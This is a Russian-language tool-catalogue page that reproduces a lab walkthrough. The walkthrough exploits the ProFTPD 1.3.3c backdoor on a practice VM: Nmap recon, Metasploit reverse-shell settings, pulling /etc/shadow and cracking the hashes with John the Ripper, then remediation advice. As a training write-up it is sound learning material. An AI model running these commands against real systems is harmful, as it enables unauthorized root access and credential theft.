Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Offensive-lab-2 — Прохождение пентеста уязвимой виртуальной машины Ubuntu. Эксплуатация бэкдора ProFTPD 1.3.3c (CVE-2010-4221) позволила получить root-доступ и захватить флаг. Включает разведку с помощью Nmap, настройку пейлоада в Metasploit и взлом хэшей пользователей (John the Ripper). | Kitploit
Инструменты/GitHubGitHub/mafiosohack/offensive-lab-2
Взлом паролейРазведкаФреймворки для эксплойтовСканирование портовАнализ уязвимостейЭксплуатацияПост-эксплуатацияCTFТестирование на Проникновение

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Обучение и Образование
Лаборатории и Практика
GitHubmafiosohack/offensive-lab-2

Offensive-lab-2

Прохождение пентеста уязвимой виртуальной машины Ubuntu. Эксплуатация бэкдора ProFTPD 1.3.3c (CVE-2010-4221) позволила получить root-доступ и захватить флаг. Включает разведку с помощью Nmap, настройку пейлоада в Metasploit и взлом хэшей пользователей (John the Ripper).

Репозиторий
59 месяцев назадЕщё не проверено

Лаборатория offensive security : Эксплойт бэкдора ProFTPD 1.3.3c (флаг root)

  1. Введение и цели

В этом отчете описан пентест, проведенный на уязвимой виртуальной машине (VM) под управлением Linux, с акцентом на выявление опасной уязвимости сервиса, позволившей получить немедленный root-доступ.

ДетальЗначение
IP-адрес цели[ 192.168.222.130]
IP-адрес атакующего (LHOST)[ 192.168.222.128]
ОС целиUbuntu 4ubuntu2.2 (ядро Linux 3.x)
ЦельПолучить shell с root-правами и извлечь файл флага.
  1. Первоначальная разведка и выявление уязвимостей

Первоначальная разведка включала сканирование сервисов с помощью Nmap для определения открытых портов и версий служб.

Команда:

root@kitploit:~
sudo nmap -sS -sV 192.168.222.130
Ключевые результаты:
 | Порт | Сервис | Версия | Риск | | :--- | :--- | :--- | :---
 | 21/tcp | ftp | ProFTPD 1.3.3c | КРИТИЧЕСКИЙ (эксплуатируемый бэкдор) |
 | 22/tcp | ssh | OpenSSH 7.2p2 | Низкий (стандартный сервис) |
 | 80/tcp | http | Apache httpd 2.4.18 | Низкий (очевидных веб-уязвимостей не найдено) |

Последующее сканирование с помощью скриптов уязвимостей подтвердило наличие крайне опасного бэкдора в FTP-сервисе.
Вывод Nmap-скрипта явно показал выполнение команд от имени root:

| ftp-proftpd-backdoor: 
|   Эта установка содержит бэкдор.
|   Команда: id
|_  Результаты: uid=0(root) gid=0(root) groups=0(root)...

3. Эксплуатация уязвимости и получение root-shell
Для эксплуатации подтвержденного бэкдора ProFTPD использовался Metasploit Framework.

Шаги эксплуатации:
Запустить Metasploit: msfconsole

Выбрать модуль эксплойта: use exploit/unix/ftp/proftpd_133c_backdoor

Задать параметры:

Bash

set RHOSTS 192.168.222.130
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.222.128

Результат: сессия командной оболочки была успешно установлена, предоставив немедленные root-привилегии (uid=0).

4. Пост-эксплуатация и получение флага
Сбор учетных данных
Хеши пользователей системы были извлечены из /etc/shadow для пост-эксплуатационного анализа. Хеш пользователя marlinspike был успешно взломан с помощью John the Ripper.

Используемая команда (на машине атакующего):

Bash

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Взломанные учетные данные:

Пользователь: marlinspike

Пароль: marlinspike

5. Рекомендации по устранению уязвимостей
Уровень безопасности системы крайне низок из-за скомпрометированного FTP-сервиса. Необходимо немедленно принять меры для защиты системы:

Немедленное обновление/исправление: сервис ProFTPD должен быть немедленно пропатчен или обновлен до безопасной версии (новее 1.3.3g), чтобы устранить известный бэкдор и связанные CVE.

Удаление сервиса: если FTP не требуется для работы системы, сервис должен быть полностью удален.

Межсетевой экран: внедрить строгие правила файрвола (iptables/ufw) для блокировки внешнего доступа к порту 21.

Безопасная конфигурация SSH: пересмотреть конфигурацию SSH, чтобы отключить вход под root и требовать аутентификацию по ключам.
Выполнить: exploit
Скачать инструмент